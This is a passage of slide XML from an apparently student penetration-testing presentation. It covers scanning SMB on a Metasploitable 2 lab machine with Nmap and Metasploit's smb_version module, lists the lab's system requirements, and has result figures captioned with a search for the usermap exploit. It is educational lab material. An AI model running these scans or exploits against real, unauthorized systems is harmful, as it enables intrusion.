              <a:rPr lang="en-IN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Detect SMB Version:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Use Nmap scripts to identify the SMB version running on the target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>machine.Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> --script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>smb-os-discovery.nse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 192.168.0.101Identifying Vulnerable SMB Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Search for Vulnerabilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Use Metasploit’s auxiliary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" alt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modules to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" alt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check for known vulnerabilities in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>the SMB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>service.Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> command in Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US"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use auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>smb</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smb_version</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700" y="3657600"/>
            <a:ext cx="8076600" cy="75600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457740" y="2895805"/>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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Flow Chart</a:t>
            </a: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dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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457200" y="1067400"/>
            <a:ext cx="8381160" cy="75600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3398441" y="583625"/>
            <a:ext cx="2180590" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Flow Chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1981200"/>
            <a:ext cx="6094870" cy="356678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457320" y="3512400"/>
            <a:ext cx="8076600" cy="75600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495720" y="2840121"/>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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>System Requirements</a:t>
            </a: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 name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342265" y="1371600"/>
            <a:ext cx="8154035" cy="5156200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Processor: Intel i5 or equivalent AMD processor (quad-core or higher)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Memory: 16 GB RAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Storage: 50 GB free disk space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Network: Ethernet or Wi-Fi connection</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Software</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VirtualBox: Version 6.1 or higher</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VMware Workstation: Version 15 or higher (alternative to VirtualBox)</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Operating Systems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Kali Linux:</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Version: Latest version (e.g., 2023.1)</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Dependencies/Modules in Python</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Metasploit Framework:</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Installed on Kali Linux</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Ensure the latest version is installed using: apt update &amp;&amp; apt install metasploit-framework</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171700" y="413001"/>
            <a:ext cx="4800600" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>System Requirements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457320" y="3512400"/>
            <a:ext cx="8076600" cy="75600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495720" y="2840121"/>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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a: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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171700" y="413001"/>
            <a:ext cx="4800600" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>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1385901" y="1340269"/>
            <a:ext cx="6127297" cy="4063365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="5753903"/>
            <a:ext cx="3277870" cy="253365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>Fig</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" spc="-10" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>Metasplotiable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t> 2</a:t>
            </a:r>
            <a:endParaRPr sz="2000" spc="-10" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"/>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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171700" y="413001"/>
            <a:ext cx="4800600" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>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767355" y="1371600"/>
            <a:ext cx="7609289" cy="3428999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="4953000"/>
            <a:ext cx="2076450" cy="219710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>Fig</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>Scanning</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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171700" y="413001"/>
            <a:ext cx="4800600" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971942" y="5296397"/>
            <a:ext cx="3035959" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Fig: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>Metasploit Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>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1371600" y="1524000"/>
            <a:ext cx="5505450" cy="35020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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171700" y="413001"/>
            <a:ext cx="4800600" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="5842708"/>
            <a:ext cx="2667000" cy="586105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Fig: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="409" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" spc="-35" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>user_map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> script(Exploit)</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>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927277" y="1491399"/>
            <a:ext cx="7704049" cy="416750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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="489240"/>
            <a:ext cx="1676400" cy="577440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631190" y="1219200"/>
